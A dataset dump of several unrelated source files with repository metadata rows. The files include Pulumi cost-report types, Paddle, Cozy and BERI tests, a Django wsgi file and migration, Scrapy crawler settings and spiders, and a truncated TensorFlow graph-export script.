"""
The group by expression to be used in the report.
:param str name: The name of the column to group. This version supports subscription lowest possible grain.
:param str type: Has type of the column to group.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the column to group. This version supports subscription lowest possible grain.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def type(self) -> str:
"""
Has type of the column to group.
"""
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigRecurrencePeriodResponse(dict):
"""
The start and end date for recurrence schedule.
"""
def __init__(__self__, *,
from_: str,
to: Optional[str] = None):
"""
The start and end date for recurrence schedule.
:param str from_: The start date of recurrence.
:param str to: The end date of recurrence. If not provided, we default this to 10 years from the start date.
"""
pulumi.set(__self__, "from_", from_)
if to is not None:
pulumi.set(__self__, "to", to)
@property
@pulumi.getter(name="from")
def from_(self) -> str:
"""
The start date of recurrence.
"""
return pulumi.get(self, "from_")
@property
@pulumi.getter
def to(self) -> Optional[str]:
"""
The end date of recurrence. If not provided, we default this to 10 years from the start date.
"""
return pulumi.get(self, "to")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigScheduleResponse(dict):
"""
The schedule associated with a report config.
"""
def __init__(__self__, *,
recurrence: str,
recurrence_period: 'outputs.ReportConfigRecurrencePeriodResponse',
status: Optional[str] = None):
"""
The schedule associated with a report config.
:param str recurrence: The schedule recurrence.
:param 'ReportConfigRecurrencePeriodResponseArgs' recurrence_period: Has start and end date of the recurrence. The start date must be in future. If present, the end date must be greater than start date.
:param str status: The status of the schedule. Whether active or not. If inactive, the report's scheduled execution is paused.
"""
pulumi.set(__self__, "recurrence", recurrence)
pulumi.set(__self__, "recurrence_period", recurrence_period)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def recurrence(self) -> str:
"""
The schedule recurrence.
"""
return pulumi.get(self, "recurrence")
@property
@pulumi.getter(name="recurrencePeriod")
def recurrence_period(self) -> 'outputs.ReportConfigRecurrencePeriodResponse':
"""
Has start and end date of the recurrence. The start date must be in future. If present, the end date must be greater than start date.
"""
return pulumi.get(self, "recurrence_period")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
The status of the schedule. Whether active or not. If inactive, the report's scheduled execution is paused.
"""
return pulumi.get(self, "status")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigSortingResponse(dict):
"""
The order by expression to be used in the report.
"""
def __init__(__self__, *,
name: str,
direction: Optional[str] = None):
"""
The order by expression to be used in the report.
:param str name: The name of the column to sort.
:param str direction: Direction of sort.
"""
pulumi.set(__self__, "name", name)
if direction is not None:
pulumi.set(__self__, "direction", direction)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the column to sort.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def direction(self) -> Optional[str]:
"""
Direction of sort.
"""
return pulumi.get(self, "direction")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigTimePeriodResponse(dict):
"""
The start and end date for pulling data for the report.
"""
def __init__(__self__, *,
from_: str,
to: str):
"""
The start and end date for pulling data for the report.
:param str from_: The start date to pull data from.
:param str to: The end date to pull data to.
"""
pulumi.set(__self__, "from_", from_)
pulumi.set(__self__, "to", to)
@property
@pulumi.getter(name="from")
def from_(self) -> str:
"""
The start date to pull data from.
"""
return pulumi.get(self, "from_")
@property
@pulumi.getter
def to(self) -> str:
"""
The end date to pull data to.
"""
return pulumi.get(self, "to")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
3605648a739014c7dc4d6313d88cac67210e7236 | 1395576291c1e8b34981dbcbfcd0fdda020083b8 | /dist_cts/dist_fleet_2.0/dist_collective_get_world_size.py | be03b9b1e048b699ca046c8e42e74f422e9b1be2 | [] | no_license | gentelyang/scripts | a8eb8a3cc5cc5bac753f1bb12033afaf89f03404 | e3562ab40b574f06bba68df6895a055fa31a085d | refs/heads/master | 2023-06-06T12:38:37.002332 | 2021-06-15T05:09:06 | 2021-06-15T05:09:06 | 262,957,519 | 0 | 4 | null | 2021-01-10T08:28:11 | 2020-05-11T06:28:08 | Python | UTF-8 | Python | false | false | 925 | py | #!/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python
#======================================================================
#
# Copyright (c) 2017 Baidu.com, Inc. All Rights Reserved
#
#======================================================================
"""
/***************************************************************************
*
* Copyright (c) 2019 Baidu.com, Inc. All Rights Reserved
* @file test.py
* @author liyang109@baidu.com
* @date 2020-12-30 15:53
* @brief
*
**************************************************************************/
"""
import sys
import paddle.distributed as dist
from utils import run_priority
@run_priority(level='P0')
def test_get_world_size():
"""get world size"""
assert dist.get_world_size() == 2
print("{} ... ok".format(sys._getframe().f_code.co_name))
if __name__ == '__main__':
test_get_world_size() | [
"liyang109@baidu.com"
] | liyang109@baidu.com |
4b84cabf2fff0894c886b5c793cbbab18128036a | 32552a2c66f9cbdcd5e1d7d8be9a91185344081e | /main.py | 1a157e4b84dccc2da0b952a308dee42d672fb85b | [] | no_license | nik-git/PyRepl | 1f6ff068fa6ee55458f7d9b131db6a6bb9a8a9ac | dbd75a1345cdec299f291d4819eaa48eac126525 | refs/heads/master | 2022-10-03T22:36:36.067629 | 2020-05-30T08:38:53 | 2020-05-30T08:38:53 | 268,037,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37 | py | print("1111111")
print("2222222222")
| [
"replituser@example.com"
] | replituser@example.com |
2d25c71d6e148cc3e4205d67c004c263518568d0 | 2eb6b96565367f2f843c3352cce03fcd7b575757 | /module_sellenium/_test_json.py | 218234e36510aeda14db74969f4e18f0f51ddf6d | [] | no_license | onitonitonito/web_beautifulsoup_scrapping | a712fc7fd58d28f89e5c1ddcbf3faac74552e263 | d07c6eebbf2731754b72b7d13f90be9d0082e776 | refs/heads/master | 2022-12-10T14:58:27.045305 | 2020-06-09T22:21:48 | 2020-07-15T22:22:50 | 148,488,834 | 1 | 1 | null | 2022-12-08T09:39:14 | 2018-09-12T13:56:23 | Python | UTF-8 | Python | false | false | 2,561 | py | """
# Reading and Writing JSON to a File in Python
# By Scott Robinson • August 17, 2016 • 5 Comments
# https://stackabuse.com/reading-and-writing-json-to-a-file-in-python/
"""
# print(__doc__)
import os
# script_run ... different dir script_run vs. terminal(cmd)
print(os.getcwd()) # --> root / working
print(os.path.abspath(os.path.curdir)) # --> root / working
print(os.path.dirname(__file__)) # --> working / working (this!)
import json
dir_current = os.path.dirname(__file__)
dir_read_write = f'{dir_current}/statics'
filename_with_dir = f'{dir_read_write}/_test_json.json'
data = {}
data['people'] = []
data['people'].append({
'name': 'Scott',
'website': 'stackabuse.com',
'from': 'Nebraska'
})
data['people'].append({
'name': 'Larry',
'website': 'google.com',
'from': 'Michigan'
})
data['people'].append({
'name': 'Tim',
'website': 'apple.com',
'from': 'Alabama'
})
with open(file=filename_with_dir, mode='w', encoding='utf8') as file:
json.dump(obj=data, fp=file, sort_keys=True, indent=2, ensure_ascii=False)
"""
{
"people": [
{
"from": "Nebraska",
"name": "Scott",
"website": "stackabuse.com"
},{
"from": "Michigan",
"name": "Larry",
"website": "google.com"
},{
"from": "Alabama",
"name": "Tim",
"website": "apple.com"
}
]
}
"""
with open(file=filename_with_dir, mode='r', encoding='utf8') as file:
_test_json = json.load(fp=file)
for i, people in enumerate(_test_json['people'],1):
[print(echo)
for echo in [
f"\n\n"
f"-------------------------",
f" ({i}) PEOPLE INFORMATION",
f"-------------------------",
f"* Name : {people['name']}",
f"* From : {people['from']}",
f"* Web site : {people['website']}",
f"-------------------------",
]
]
"""
-------------------------
(1) PEOPLE INFORMATION
-------------------------
* Name : Scott
* From : Nebraska
* Web site : stackabuse.com
-------------------------
-------------------------
(2) PEOPLE INFORMATION
-------------------------
* Name : Larry
* From : Michigan
* Web site : google.com
-------------------------
-------------------------
(3) PEOPLE INFORMATION
-------------------------
* Name : Tim
* From : Alabama
* Web site : apple.com
-------------------------
"""
| [
"nitt0x0@gmail.com"
] | nitt0x0@gmail.com |
51541cfc0efce6e3743209630d5aae189c992744 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Kivy/kivy/kivy/tests/test_filechooser_unicode.py | f90c297541a79baedf8ea10dc76f7b6cc75794d2 | [
"MIT"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:29d8bc5fa93406bc313e889d4aeb384ef0b92ca711d0d2dcacbfa64e34adbbca
size 3716
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
2adc1b4411370663446ddd23ae426129db13c18d | 133d0f5c7122829ec1e5a5dacdd96a3fa8aa4fc2 | /tests/typecheck.py | 0830182b40042742b608397268f7f0e3201f1eff | [
"Apache-2.0"
] | permissive | izgzhen/cozy | e4b44bb6939c6892919225bba91520913ba55a75 | fc57fdccdd52c5ecf4c4ae4e8b80af97e8119b77 | refs/heads/master | 2020-03-29T01:01:11.270275 | 2018-09-27T16:39:51 | 2018-09-27T16:39:51 | 149,367,207 | 0 | 0 | Apache-2.0 | 2018-09-19T00:12:02 | 2018-09-19T00:12:02 | null | UTF-8 | Python | false | false | 2,790 | py | import unittest
from cozy.syntax_tools import mk_lambda
from cozy.target_syntax import *
from cozy.structures.heaps import *
from cozy.typecheck import typecheck, retypecheck
class TestTypechecking(unittest.TestCase):
def test_map_over_noncollection(self):
x = EVar("x").with_type(TInt())
e = EMap(x, mk_lambda(TInt(), lambda elem: EBool(True)))
errs = typecheck(e, { x.id : x.type })
assert errs
def test_filter_over_noncollection(self):
x = EVar("x").with_type(TInt())
e = EFilter(x, mk_lambda(TInt(), lambda elem: EBool(True)))
errs = typecheck(e, { x.id : x.type })
assert errs
def test_flatmap(self):
e = EBinOp(EFlatMap(EBinOp(EVar('ys').with_type(TBag(THandle('ys', TInt()))), '+', EEmptyList().with_type(TBag(THandle('ys', TInt())))).with_type(TBag(THandle('ys', TInt()))), ELambda(EVar('_var12').with_type(THandle('ys', TInt())), EUnaryOp('sum', ESingleton(ENum(1).with_type(TInt())).with_type(TBag(TInt()))).with_type(TInt()))).with_type(TBag(TInt())), '==', ENum(0).with_type(TInt())).with_type(TBool())
assert not retypecheck(e)
def test_sum(self):
xs = EVar("xs").with_type(TBag(TBool()))
e = EUnaryOp("sum", xs)
assert not retypecheck(e)
def test_ECond_1(self):
x = ENum(1).with_type(INT)
assert retypecheck(ECond(EBool(True), x, x))
def test_ECond_2(self):
x = ENum(1).with_type(INT)
y = EBool(False)
assert not retypecheck(ECond(EBool(True), x, y))
def test_ECond_3(self):
x = ENum(1).with_type(INT)
y = EBool(False)
assert not retypecheck(ECond(EBool(True), y, x))
def test_ECond_4(self):
x = ENum(1).with_type(INT)
assert not retypecheck(ECond(x, x, x))
def test_lambda_arg_inference(self):
s = ESingleton(ETRUE)
x = EVar("x")
assert retypecheck(EFilter(s, ELambda(x, x)))
assert retypecheck(EMap(s, ELambda(x, x)))
assert retypecheck(EMakeMap2(s, ELambda(x, x)))
def test_heaps(self):
e = ECond(EBinOp(EBinOp(EMapGet(EStateVar(EMakeMap2(EVar('xs'), ELambda(EVar('_var39381'), EUnaryOp('len', EFilter(EVar('xs'), ELambda(EVar('_var39382'), EBinOp(EVar('_var39381'), '==', EVar('_var39382')))))))), ENum(0).with_type(INT)), '==', ENum(1).with_type(INT)), 'and', EBinOp(ENum(0).with_type(INT), '==', EStateVar(EArgMin(EVar('xs'), ELambda(EVar('_var21501'), EVar('_var21501')))))), EHeapPeek2(EStateVar(EMakeMinHeap(EVar('xs'), ELambda(EVar('_var21501'), EVar('_var21501')))), EStateVar(EUnaryOp('len', EVar('xs')))), EStateVar(EArgMin(EVar('xs'), ELambda(EVar('_var21501'), EVar('_var21501')))))
assert retypecheck(e, env={
"xs": INT_BAG,
"_var21501": INT})
| [
"loncaric@cs.washington.edu"
] | loncaric@cs.washington.edu |
fd2b0f889ccef3fce7487a8374f5de0e950177a6 | 561464f786e855668663a6928f123beaf05b1f1f | /wsgi.py | 51888168228f9dbeb1e14074af7757da37a66770 | [] | no_license | Coderpool/Coderpool-Registration-App | 0ee2ebc0e5c14d1af98f13d19e9604c1afaa7878 | adf29303cf113650544ea86fa5b17e52d89e99fc | refs/heads/master | 2021-01-15T13:29:30.045896 | 2013-12-06T01:55:25 | 2013-12-06T01:55:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 306 | py | import os
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
project_home = BASE_DIR
if project_home not in sys.path:
sys.path.append(project_home)
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
| [
"rajeevs1992@gmail.com"
] | rajeevs1992@gmail.com |
05d70d9526d627b8fe1b541ceec8e5df4e321c8a | 5dc7dcf5938a60f1dc23cb0bf7578f2ae9ca283a | /main.py | d26fe77abc6cb68504c30ed0aeb4cedd063bbbc9 | [] | no_license | afcarl/Visual-Ballistic-Roulette-Vision | 41cbb83b6115c8d7cf81a1c05054a1a02da82de7 | d4209b92f529256b956fbae78ebaac856cd61e04 | refs/heads/master | 2020-03-22T01:10:09.763037 | 2017-02-10T06:38:04 | 2017-02-10T06:38:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | import os
from ball_tracking_from_gradients import start_ball_analysis
from utils import results_dir
from wheel_green_tracking_from_frames import start_wheel_analysis
def list_to_str(s):
return str(', '.join(['{0:.2f}'.format(b) for b in s]) + '\n')
if __name__ == '__main__':
print('Python script has started. Please wait.')
balls = start_ball_analysis()
wheels = start_wheel_analysis()
print('\n -- \n')
print('BALL = {}'.format(balls))
print('WHEEL = {}'.format(wheels))
results_filename = os.path.join(results_dir(), 'results.txt')
with open(results_filename, 'wt', encoding='utf-8') as f:
f.write(list_to_str(balls))
f.write(list_to_str(wheels))
| [
"premy@reactive.co.jp"
] | premy@reactive.co.jp |
158ccde3af8d872aa64f1f1b97bb0a698fd8a377 | c4fa1ebcdd413c4ab3f0979ee3beead8a8809870 | /providers/edu/pdxscholar/migrations/0001_initial.py | 795f466f367dfb4f418cfb10dda1a00b2ca7243e | [] | no_license | terroni/SHARE | e47f291db7cf100d29a7904fe820e75d29db1472 | a5631f441da1288722c68785b86128c854cbe7c1 | refs/heads/develop | 2020-12-03T02:29:47.381341 | 2016-07-11T19:40:27 | 2016-07-11T19:40:27 | 63,097,148 | 1 | 0 | null | 2016-07-11T19:45:51 | 2016-07-11T19:45:50 | null | UTF-8 | Python | false | false | 667 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-08 15:45
from __future__ import unicode_literals
from django.db import migrations
import share.robot
class Migration(migrations.Migration):
dependencies = [
('share', '0001_initial'),
('djcelery', '0001_initial'),
]
operations = [
migrations.RunPython(
code=share.robot.RobotUserMigration('edu.pdxscholar'),
),
migrations.RunPython(
code=share.robot.RobotOauthTokenMigration('edu.pdxscholar'),
),
migrations.RunPython(
code=share.robot.RobotScheduleMigration('edu.pdxscholar'),
),
]
| [
"cwisecarver@cos.io"
] | cwisecarver@cos.io |
008b8ae4c04e14d9cdce23fbd160c2d6fada69a3 | e2e1732b6eb1a7a6dfeba76762851ad06eb8e482 | /wangban/wangban/spiders/beifen/2/ningbo/daxiekaifaqu.py | 1c2493c906df0eb3ec37744b776a18dbfa62a0cb | [] | no_license | nightqiuhua/bigCrawlers | 551e80d55df492c89ae0e0e0bd70c0e5f873068d | 19b86130c8af057d06014865d150e3d2ed6cc319 | refs/heads/main | 2023-03-23T01:13:26.021850 | 2021-03-03T15:09:28 | 2021-03-03T15:09:28 | 344,165,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,823 | py | # -*- coding: utf-8 -*-
import os
from datetime import datetime
import os
from urllib.parse import urlparse
import re
import time
from wangban_utils.Json2Xpath import Json2XPath,XPath
from wangban_utils.single_mode import singleton
from urllib.parse import urljoin
from scrapy.utils.project import get_project_settings
from spiders.basemodel import DIYBaseSpider
SETTINGS = get_project_settings()
JSONFILE = os.path.join(SETTINGS['BASE_JSONFILE_PATH'],'daxiekaifaqu.json')
@singleton
class DaXieKaiFaQuSpider(DIYBaseSpider):
name = 'daxiekaifaqu'
start_urls = ['http://daxie.bidding.gov.cn/']
source_website = '宁波市大榭开发区公共资源交易网'
specific_area = '大榭开发区'
source_url = 'http://daxie.bidding.gov.cn/'
links_tree = {}
loss_urls = {}
column_urls_pool = []
def __init__(self,jsonfile = JSONFILE):
super().__init__()
self.xp = Json2XPath(jsonfile).get_xpath()
self.post_suf = 'index_{}'
def get_totalpage(self,response):
try:
total_page = response.xpath(self.xp.total_page).extract()[0]
#print(response.xpath(self.xp.total_page).extract())
total_page = re.findall(r'/(\d+)页',total_page)[0]
except Exception as e:
print('get_totalpage error_reason',e)
print('url',response.url)
total_page = 1
#print('total_page is ',total_page)
total_page = self.set_totalpage(total_page)
return total_page
def get_elem_url(self,element,response=None):
an_url = self.source_url
try:
elem_url = element.xpath(self.xp.an_url).extract()[0]
an_url = urljoin(self.source_url,elem_url)
except Exception as e:
print('get_elem_url error',e)
print('url',response.url)
an_url = self.source_url
#print(an_url)
return an_url
def get_on_date(self,element,response=None):
try:
on_date = element.xpath(self.xp.on_date).extract()[0]
on_date = re.findall(r'(\d+-\d+-\d+)',on_date)[0]
except Exception as e:
on_date = 'NONE'
print('get on date error',e)
print('url',response.url)
#print(on_date)
return on_date
def get_an_title(self,element,response=None):
an_title = 'NONE'
try:
an_title = element.xpath(self.xp.an_title).extract()[0]
except Exception as e:
print('get_an_title error',e)
print('url',response.url)
#print(an_title)
return an_title
def cre_page_url(self,f_p_url,page):
if page == 0:
page = 1
page_url = f_p_url.replace('index',self.post_suf.format(page))
#print('page_url',page_url)
return page_url | [
"1320551630@qq.com"
] | 1320551630@qq.com |
8bc54841f877590a71e85e5c7203a64d7bac48f9 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03959/s162228731.py | 956fa1077360361e08a0ffa20848604515bb78c8 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 985 | py | def work(n, t, a):
if t[-1] != a[0]:
return 0
middle = 0
for i in xrange(n):
if t[i] == a[i]:
if t[i] != t[-1] or t[i] != a[0]:
return 0
middle = i
break
for i in xrange(middle, n):
if t[i] < a[i]:
return 0
record = [None] * n
left, right = 0, n - 1
while left <= right and t[left] < a[left]:
if not left or t[left] > t[left-1]:
record[left] = 1
else:
record[left] = t[left]
left += 1
record[left] = 1
while left < right and a[right] <= t[right]:
if right == n - 1 or a[right] > a[right+1]:
record[right] = 1
else:
record[right] = a[right]
right -= 1
ans = 1
for i in xrange(n):
ans = (ans*record[i]) % (10**9+7)
return ans
n = int(raw_input())
t = map(int, raw_input().split())
a = map(int, raw_input().split())
print work(n, t, a)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
44c2bb2dde1375f2c6043f1a16a82e63308efb08 | 5b95b83ba7e18cb40babab37bcb0f5b63bfef3bb | /script15.py | 443a772f633bd2334e704eeac1f382924dbc5e23 | [] | no_license | Moandh81/w3ressources_python | d9269959cc35c1df4a0ca9d37575c94fb96195f6 | 7a3c65bca50097c2e9b92591443dcb6b03a384a3 | refs/heads/master | 2020-03-30T22:42:23.673212 | 2019-11-11T19:58:16 | 2019-11-11T19:58:16 | 151,675,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | #!/usr/bin/python
# -*- coding: utf-8 -*
#Python Data Type: String - Exercises
#Write a Python function to get a string made of 4 copies of
#the last two characters of a specified string (length must be at least 2
chaine="Hello world"
if len(chaine) >=2:
print((chaine[len(chaine) -2] + chaine[len(chaine) - 1]) * 4)
else:
print("la chaine n'a pas plus de deux caracteres et par conséquent elle ne peut pas etre traitée ") | [
"anis.dhouieb@gmail.com"
] | anis.dhouieb@gmail.com |
5d0e40c90b389c948a09261dfa0d920b443dbb01 | df3acbc57da3462643288504c5f5c8ba00e142a6 | /DangDang_Books/dangdang/dangdang/settings.py | 1d82ea3fb7ff2f9b3fc9c766c0089c03cbbae342 | [] | no_license | tangzhen10/Python_Crawler | 7817c38b01410364e94f76694cb92826b0859400 | 18dfd7e755b163ce15f9acd0bc49e8c450ff6198 | refs/heads/master | 2020-07-27T08:28:13.245375 | 2019-09-04T11:04:23 | 2019-09-04T11:04:23 | 209,029,654 | 1 | 0 | null | 2019-09-17T10:55:10 | 2019-09-17T10:55:10 | null | UTF-8 | Python | false | false | 3,092 | py | # -*- coding: utf-8 -*-
# Scrapy settings for dangdang project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'dangdang'
SPIDER_MODULES = ['dangdang.spiders']
NEWSPIDER_MODULE = 'dangdang.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'dangdang (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'dangdang.middlewares.DangdangSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'dangdang.middlewares.DangdangDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'dangdang.pipelines.DangdangPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"why957177569@163.com"
] | why957177569@163.com |
cbf52a5a72f51750a9828b5b79b7616c161ce741 | 1cd909991a97c12752d81e334659c573c3bb6652 | /cheritest/trunk/tests/mt/test_mt_rdhwr.py | 2a1403eacaf47d96ff7989d204bd617ee83ff27c | [
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-beri-hw-sw-1.0"
] | permissive | conan789123/beri | 47ce884d5bf5635ef5dd3e64adfe7735996384ad | cef1b41d52592cfa7454ddf59f9f2994e447cd66 | refs/heads/master | 2020-03-28T05:57:17.172443 | 2017-03-27T17:21:10 | 2017-03-27T17:21:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,520 | py | #-
# Copyright (c) 2014 Michael Roe
# All rights reserved.
#
# This software was developed by SRI International and the University of
# Cambridge Computer Laboratory under DARPA/AFRL contract FA8750-10-C-0237
# ("CTSRD"), as part of the DARPA CRASH research programme.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
from nose.plugins.attrib import attr
class test_mt_rdhwr(BaseBERITestCase):
@attr('mt')
@attr('rdhwr')
@attr('userlocal')
def test_rdhwr_1(self):
'''Test that the user-local register has a per-thread value'''
self.assertRegisterEqual(self.MIPS.a0, 0, "The user local register did not have a per-thread value")
| [
"cl-beri-discuss@lists.cam.ac.uk"
] | cl-beri-discuss@lists.cam.ac.uk |
331bef022949cda2d9ab90b645a7c857d91a7fd5 | abc4ad00b4f267e43954db01f6540282a5d0ffea | /code/export_inference_graph.py | 2b35b3534477d1b4549653aef6eb001111178eb3 | [] | no_license | yuanyuanzijin/flower-recognition | 0ed6ab7bbcf91779cefab77f924942071690fe0e | 971e43b4926c6b8b14e91c3b1ccbeea2d8d60334 | refs/heads/master | 2021-08-29T23:14:33.395849 | 2017-12-14T23:49:50 | 2017-12-14T23:49:50 | 114,340,517 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,953 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Saves out a GraphDef containing the architecture of the model.
To use it, run something like this, with a model name defined by slim:
bazel build tensorflow_models/slim:export_inference_graph
bazel-bin/tensorflow_models/slim/export_inference_graph \
--model_name=inception_v3 --output_file=/tmp/inception_v3_inf_graph.pb
If you then want to use the resulting model with your own or pretrained
checkpoints as part of a mobile model, you can run freeze_graph to get a graph
def with the variables inlined as constants using:
bazel build tensorflow/python/tools:freeze_graph
bazel-bin/tensorflow/python/tools/freeze_graph \
--input_graph=/tmp/inception_v3_inf_graph.pb \
--input_checkpoint=/tmp/checkpoints/inception_v3.ckpt \
--input_binary=true --output_graph=/tmp/frozen_inception_v3.pb \
--output_node_names=InceptionV3/Predictions/Reshape_1
The output node names will vary depending on the model, but you can inspect and
estimate them using the summarize_graph tool:
bazel build tensorflow/tools/graph_transforms:summarize_graph
bazel-bin/tensorflow/tools/graph_transforms/summarize_graph \
--in_graph=/tmp/inception_v3_inf_graph.pb
To run the resulting graph in C++, you can look at the label_image sample code:
bazel build tensorflow/examples/label_image:label_image
bazel-bin/tensorflow/examples/label_image/label_image \
--image=${HOME}/Pictures/flowers.jpg \
--input_layer=input \
--output_layer=InceptionV3/Predictions/Reshape_1 \
--graph=/tmp/frozen_inception_v3.pb \
--labels=/tmp/imagenet_slim_labels.txt \
--input_mean=0 \
--input_std=255 \
--logtostderr
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.platform import gfile
from datasets import dataset_factory
from preprocessing import preprocessing_factory
from nets import nets_factory
slim = tf.contrib.slim
tf.app.flags.DEFINE_string(
'model_name', 'inception_v3', 'The name of the architecture to save.')
tf.app.flags.DEFINE_boolean(
'is_training', False,
'Whether to save out a training-focused version of the model.')
tf.app.flags.DEFINE_integer(
'default_image_size', 224,
'The image size to use if the model does not define it.')
tf.app.flags.DEFINE_string('dataset_name', 'imagenet',
'The name of the dataset to use with the model.')
tf.app.flags.DEFINE_integer(
'labels_offset', 0,
'An offset for the labels in the dataset. This flag is primarily used to '
'evaluate the VGG and ResNet architectures which do not use a background '
'class for the ImageNet dataset.')
